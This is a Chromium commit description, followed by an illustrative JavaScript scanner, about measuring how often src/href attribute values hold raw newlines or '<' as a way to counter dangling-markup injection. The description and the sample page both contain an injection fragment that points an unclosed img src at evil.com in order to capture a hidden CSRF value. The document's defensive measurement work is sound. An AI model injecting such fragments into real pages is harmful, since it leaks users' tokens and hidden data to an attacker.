Description

Measure URL resolution with raw newlines and braces.

Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.

BUG=680970
R=jochen@chromium.org
Review-Url: https://codereview.chromium.org/2629393002
Cr-Commit-Position: refs/heads/master@{#443793}
Committed: https://chromium.googlesource.com/chromium/src/+/63ec3598c662f32715148c25faf99771c9d1cb6c
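
The measurement described above, as an added example that is not part of the original change or of Chromium's code: a simplified scan of `src`/`href` attribute values that counts how many contain a raw newline or a `<`. The sample markup, the token value and the function names are constructed for illustration, and the regex only approximates HTML attribute tokenization.

```javascript
// Constructed page: the <img> opens a single-quoted src that is never
// closed, so the attribute value runs on to the next "'" in the document.
const SAMPLE_HTML = [
  "<p>Hello</p>",
  "<img src='https://evil.com/?whatever=", // injected fragment from the description
  '<input type="hidden" name="csrf" value="constructed-token-123">',
  "<p class='note'>done</p>",
  '<a href="/safe/path">ok</a>',
].join("\n");

// Hypothetical helper: collect src/href values as a lax parser would delimit
// them and flag the ones that would trip either proposed restriction.
function findSuspiciousUrlAttributes(html) {
  const findings = [];
  // Quoted values may span lines and tags; unquoted values end at whitespace or '>'.
  const attr = /\b(src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  let m;
  while ((m = attr.exec(html)) !== null) {
    const value = m[2] ?? m[3] ?? m[4];
    const hasNewline = value.includes("\n");
    const hasLessThan = value.includes("<");
    if (hasNewline || hasLessThan) {
      findings.push({ attribute: m[1].toLowerCase(), hasNewline, hasLessThan, value });
    }
  }
  return findings;
}

// Hypothetical counters in the spirit of "add metrics and see what we see".
function measure(html) {
  const counts = { newlineOnly: 0, lessThanOnly: 0, both: 0 };
  for (const f of findSuspiciousUrlAttributes(html)) {
    if (f.hasNewline && f.hasLessThan) counts.both += 1;
    else if (f.hasNewline) counts.newlineOnly += 1;
    else counts.lessThanOnly += 1;
  }
  return counts;
}

console.log(measure(SAMPLE_HTML));
console.log(findSuspiciousUrlAttributes(SAMPLE_HTML).map((f) => f.attribute));
```

On the constructed page the single flagged `src` value contains the hidden input's markup, which is the exposure the description refers to; the well-formed `href` is not counted.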
Patch Set 1
Patch Set 2: Formatting.